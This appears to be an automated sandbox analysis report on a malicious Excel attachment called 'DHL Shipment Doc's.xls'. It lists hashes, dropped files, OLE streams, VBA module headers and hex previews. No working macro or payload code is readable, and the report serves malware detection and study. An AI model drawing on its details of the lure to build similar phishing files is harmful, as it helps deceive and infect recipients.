                                                                                                                                            Preview:......................>...............................................................................;.......................i.......k................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):26
                                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Oct 4 10:56:11 2024, Security: 1
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1086464
                                                                                                                                            Entropy (8bit):7.284081399187737
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12288:DmzHJEHAfwu4hTD3DERnLRmF8DNNrf1X3dmau5dx8vHimlTv/RSLGL/krIK:SLw/hTbARM8jt3OEH9BSLGL/I
                                                                                                                                            MD5:8A75C017EA42102675CA8B9833B4DD66
                                                                                                                                            SHA1:522F239487BD6D6E33354EB35D4A268A0D331EDC
                                                                                                                                            SHA-256:E1F8CB824A295999760E0D6CD413EC44BD420B1A41516D108F6C2AE01716752B
                                                                                                                                            SHA-512:390069EDBA38D0FDF6CEB185E2F3C8A781883B040164A336D39F46820CAAA45C271EC3E174C7E23BC21D21329F1A1EBFFE0FBE52A857FA1475573062ADF17499
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:......................>...............................................................................;.......................i.......k................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                                                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Oct 4 07:17:07 2024, Security: 1
                                                                                                                                            Entropy (8bit):7.263642056491532
                                                                                                                                            TrID:
                                                                                                                                            • Microsoft Excel sheet (30009/1) 47.99%
                                                                                                                                            • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                                                                                            • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                                                                                            File name:DHL Shipment Doc's.xls
                                                                                                                                            File size:1'095'168 bytes
                                                                                                                                            MD5:f61e677376c11919999dcd7bd939f6c5
                                                                                                                                            SHA1:10d5926578f1a7bd2cab214c816abea6d22e4eca
                                                                                                                                            SHA256:7cc0739b302669074993c36213f72e4d9be65162e7e445f541e33ea86153083c
                                                                                                                                            SHA512:b2bac247b2d88898e44c00cd392a072546e01f7e0d4ae7d2843806737b2a0b04df0cb154892a1d77279174f62a28fa5c80d8d5e4d73f151ab83f960136cd7fd2
                                                                                                                                            SSDEEP:24576:2Lw/h+bARM8DR3p4L/PFqdNIe9Nf+N8JmVH:2L89Pl+LXFk+Mwr
                                                                                                                                            TLSH:ED35CF83EA1D4F62CE45423066F7477A1324CC43D622872B22F5772839FBAD06956FAD
                                                                                                                                            File Content Preview:........................>...............................................................................<.......................j.......l......................................................................................................................
                                                                                                                                            Icon Hash:276ea3a6a6b7bfbf
                                                                                                                                            Document Type:OLE
                                                                                                                                            Number of OLE Files:1
                                                                                                                                            Has Summary Info:
                                                                                                                                            Application Name:Microsoft Excel
                                                                                                                                            Encrypted Document:True
                                                                                                                                            Contains Word Document Stream:False
                                                                                                                                            Contains Workbook/Book Stream:True
                                                                                                                                            Contains PowerPoint Document Stream:False
                                                                                                                                            Contains Visio Document Stream:False
                                                                                                                                            Contains ObjectPool Stream:False
                                                                                                                                            Flash Objects Count:0
                                                                                                                                            Contains VBA Macros:True
                                                                                                                                            Code Page:1252
                                                                                                                                            Author:
                                                                                                                                            Last Saved By:
                                                                                                                                            Create Time:2006-09-16 00:00:00
                                                                                                                                            Last Saved Time:2024-10-04 06:17:07
                                                                                                                                            Creating Application:Microsoft Excel
                                                                                                                                            Security:1
                                                                                                                                            Document Code Page:1252
                                                                                                                                            Thumbnail Scaling Desired:False
                                                                                                                                            Contains Dirty Links:False
                                                                                                                                            Shared Document:False
                                                                                                                                            Changed Hyperlinks:False
                                                                                                                                            Application Version:786432
                                                                                                                                            General
                                                                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                                                                                            VBA File Name:Sheet1.cls
                                                                                                                                            Stream Size:977
                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                                                                                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 d1 29 d9 a9 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                            Attribute VB_Name = "Sheet1"
                                                                                                                                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                            Attribute VB_GlobalNameSpace = False
                                                                                                                                            Attribute VB_Creatable = False
                                                                                                                                            Attribute VB_PredeclaredId = True
                                                                                                                                            Attribute VB_Exposed = True
                                                                                                                                            Attribute VB_TemplateDerived = False
                                                                                                                                            Attribute VB_Customizable = True
                                                                                                                                            

                                                                                                                                            General
                                                                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                                                                                                            VBA File Name:Sheet2.cls
                                                                                                                                            Stream Size:977
                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) L . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                                                                                                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 d1 29 4c 0e 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                            Attribute VB_Name = "Sheet2"
                                                                                                                                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                            Attribute VB_GlobalNameSpace = False
                                                                                                                                            Attribute VB_Creatable = False
                                                                                                                                            Attribute VB_PredeclaredId = True
                                                                                                                                            Attribute VB_Exposed = True
                                                                                                                                            Attribute VB_TemplateDerived = False
                                                                                                                                            Attribute VB_Customizable = True
                                                                                                                                            

                                                                                                                                            General
                                                                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                                                                                                            VBA File Name:Sheet3.cls
                                                                                                                                            Stream Size:977
                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) t . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                                                                                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 d1 29 74 e2 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                            Attribute VB_Name = "Sheet3"
                                                                                                                                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                            Attribute VB_GlobalNameSpace = False
                                                                                                                                            Attribute VB_Creatable = False
                                                                                                                                            Attribute VB_PredeclaredId = True
                                                                                                                                            Attribute VB_Exposed = True
                                                                                                                                            Attribute VB_TemplateDerived = False
                                                                                                                                            Attribute VB_Customizable = True
                                                                                                                                            

                                                                                                                                            General
                                                                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                                                                                            VBA File Name:ThisWorkbook.cls
                                                                                                                                            Stream Size:985
                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - . 0
                                                                                                                                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 d1 29 b7 8b 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                            Attribute VB_Name = "ThisWorkbook"
                                                                                                                                            Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                                                                                            Attribute VB_GlobalNameSpace = False
                                                                                                                                            Attribute VB_Creatable = False
                                                                                                                                            Attribute VB_PredeclaredId = True
                                                                                                                                            Attribute VB_Exposed = True
                                                                                                                                            Attribute VB_TemplateDerived = False
                                                                                                                                            Attribute VB_Customizable = True
                                                                                                                                            

                                                                                                                                            General
                                                                                                                                            Stream Path:\x1CompObj
                                                                                                                                            CLSID:
                                                                                                                                            File Type:data
                                                                                                                                            Stream Size:114
                                                                                                                                            Entropy:4.25248375192737
                                                                                                                                            Base64 Encoded:True
                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                                                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                            General
                                                                                                                                            Stream Path:\x5DocumentSummaryInformation
                                                                                                                                            CLSID:
                                                                                                                                            File Type:data
                                                                                                                                            Stream Size:244
                                                                                                                                            Entropy:2.889430592781307
                                                                                                                                            Base64 Encoded:False
                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                                                                                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                                                                                                            General
                                                                                                                                            Stream Path:\x5SummaryInformation
                                                                                                                                            CLSID:
                                                                                                                                            File Type:data
                                                                                                                                            Stream Size:200
                                                                                                                                            Entropy:3.2920681057018664
                                                                                                                                            Base64 Encoded:False
                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . % . . . . . . . . . .
                                                                                                                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                                            General
                                                                                                                                            Stream Path:MBD0029C934/\x1CompObj
                                                                                                                                            CLSID:
                                                                                                                                            File Type:data
                                                                                                                                            Stream Size:114
                                                                                                                                            Entropy:4.25248375192737
                                                                                                                                            Base64 Encoded:True
                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                                                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                            General
                                                                                                                                            Stream Path:MBD0029C934/\x5DocumentSummaryInformation
                                                                                                                                            CLSID:
                                                                                                                                            File Type:data
                                                                                                                                            Stream Size:244
                                                                                                                                            Entropy:2.701136490257069
                                                                                                                                            Base64 Encoded:False
                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                                                                                                                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
                                                                                                                                            General
                                                                                                                                            Stream Path:MBD0029C934/\x5SummaryInformation
                                                                                                                                            CLSID:
                                                                                                                                            File Type:dBase III DBT, version number 0, next free block index 65534, 1st item "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377"
                                                                                                                                            Stream Size:90976
                                                                                                                                            Entropy:1.885975041684416
                                                                                                                                            Base64 Encoded:True
                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . 0 c . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . . . . . . . . . . . . G . . . t b . . . . . . . . u . 2 . . . . . . . . . 2 . . . . ! . . . . . . . . . . v . . . ! . . A . . .
                                                                                                                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 30 63 01 00 09 00 00 00 01 00 00 00 50 00 00 00 04 00 00 00 58 00 00 00 08 00 00 00 64 00 00 00 12 00 00 00 70 00 00 00 0b 00 00 00 88 00 00 00 0c 00 00 00 94 00 00 00 0d 00 00 00 a0 00 00 00 13 00 00 00 ac 00 00 00 11 00 00 00 b4 00 00 00
                                                                                                                                            General
                                                                                                                                            Stream Path:MBD0029C934/MBD0018D4CE/\x1Ole
                                                                                                                                            CLSID:
                                                                                                                                            File Type:data
                                                                                                                                            Stream Size:20
                                                                                                                                            Entropy:0.5689955935892812
                                                                                                                                            Base64 Encoded:False
                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                                                                                                            Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                            General
                                                                                                                                            Stream Path:MBD0029C934/MBD0018D4CE/\x3ObjInfo
                                                                                                                                            CLSID:
                                                                                                                                            File Type:data
                                                                                                                                            Stream Size:4
                                                                                                                                            Entropy:0.8112781244591328
                                                                                                                                            Base64 Encoded:False
                                                                                                                                            Data ASCII:. . . .
                                                                                                                                            Data Raw:00 00 03 00
                                                                                                                                            General
                                                                                                                                            Stream Path:MBD0029C934/MBD0018D4CE/Contents
                                                                                                                                            CLSID:
                                                                                                                                            File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
                                                                                                                                            Stream Size:197671
                                                                                                                                            Entropy:6.989042939766534
                                                                                                                                            Base64 Encoded:True
                                                                                                                                            Data ASCII:C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                            Data Raw:43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                            General
                                                                                                                                            Stream Path:MBD0029C934/MBD002A52B4/\x1CompObj
                                                                                                                                            CLSID:
                                                                                                                                            File Type:data
                                                                                                                                            Stream Size:114
                                                                                                                                            Entropy:4.219515110876372
                                                                                                                                            Base64 Encoded:False
                                                                                                                                            Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                                                                                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                            General
                                                                                                                                            Stream Path:MBD0029C934/MBD002A52B4/Package
                                                                                                                                            CLSID:
                                                                                                                                            File Type:Microsoft Excel 2007+
                                                                                                                                            Stream Size:50945
                                                                                                                                            Entropy:7.631071730257267
                                                                                                                                            Base64 Encoded:True
                                                                                                                                            Data ASCII:P K . . . . . . . . . . ! . E o . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                            Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 e3 45 b7 6f 8c 01 00 00 c0 05 00 00 13 00 ce 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 ca 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                            General
                                                                                                                                            Stream Path:MBD0029C934/MBD002A56E1/\x1CompObj
                                                                                                                                            CLSID:
                                                                                                                                            File Type:data
                                                                                                                                            Stream Size:114
                                                                                                                                            Entropy:4.219515110876372
                                                                                                                                            Base64 Encoded:False
                                                                                                                                            Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                                                                                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                            General
                                                                                                                                            Stream Path:MBD0029C934/MBD002A56E1/Package
                                                                                                                                            CLSID:
                                                                                                                                            File Type:Microsoft Excel 2007+
                                                                                                                                            Stream Size:31124
                                                                                                                                            Entropy:7.746149934092623
                                                                                                                                            Base64 Encoded:True
                                                                                                                                            Data ASCII:P K . . . . . . . . . . ! . . p @ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                            Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 13 70 40 80 a3 01 00 00 e2 05 00 00 13 00 cf 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 cb 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                            General
                                                                                                                                            Stream Path:MBD0029C934/MBD002A5E23/\x1CompObj
                                                                                                                                            CLSID:
                                                                                                                                            File Type:data
                                                                                                                                            Stream Size:114
                                                                                                                                            Entropy:4.25248375192737
                                                                                                                                            Base64 Encoded:True
                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                                                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                            General
                                                                                                                                            Stream Path:MBD0029C934/MBD002A5E23/\x5DocumentSummaryInformation
                                                                                                                                            CLSID:
                                                                                                                                            File Type:data
                                                                                                                                            Stream Size:484
                                                                                                                                            Entropy:3.922883556049869
                                                                                                                                            Base64 Encoded:True
